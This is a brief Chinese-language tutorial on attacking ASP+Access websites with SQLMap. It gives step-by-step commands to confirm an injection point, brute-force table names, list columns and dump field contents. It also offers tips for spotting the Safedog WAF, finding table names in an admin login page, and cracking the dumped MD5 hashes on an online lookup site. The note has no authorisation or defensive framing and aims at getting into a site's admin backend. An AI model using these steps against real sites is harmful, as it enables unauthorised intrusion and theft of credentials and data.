SQLMap注SQLMap注入Access
一、小常识:
- asp+acess //最常见,常见于小型网站。mdb文件
- asp+mssql //偶尔见
- asp+mysql //罕见
- 用单引号进行探测时,如果有网站安全狗,会有非常明显的表示,比如响应报文首部的server字段会提示safedog 或者是 waf2.0
- 注意:发现是acess数据库有漏洞别急着就开始注入,就算注入出来了,如果没有找到后台管理员登陆界面,也没有用
二、基本步骤:
1.判断是否存在注入
sqlmap -u [URL] //如果url存在注入点,将会显示出web容器、数据库版本信息等
2.获取数据表名 //不需要获取数据库名,只有一个数据库,为dbs文件。
2.1 sqlmap -u [URL] -tables . 由于acess的特性,需要通过暴力猜解,使用默认的字典就行。
2.2 输入线程:1-10都可以,中途崩掉就降低线程。
小技巧// 如果找到网站后台登陆页面——右键检查页面元素——name字段中的内容可能为数据表名/字段名等
3.获取列名
sqlmap -u [URL] -T [表名] --columns
4.获取字段内容
sqlmap -u [URL] -T [表名] -C [列名]... --dump
//最终获取内容之后不需要存储hash,也不需要用字典破解,因为sqlmap本身破解能力较弱。
md5解码网站:www.cmd5.com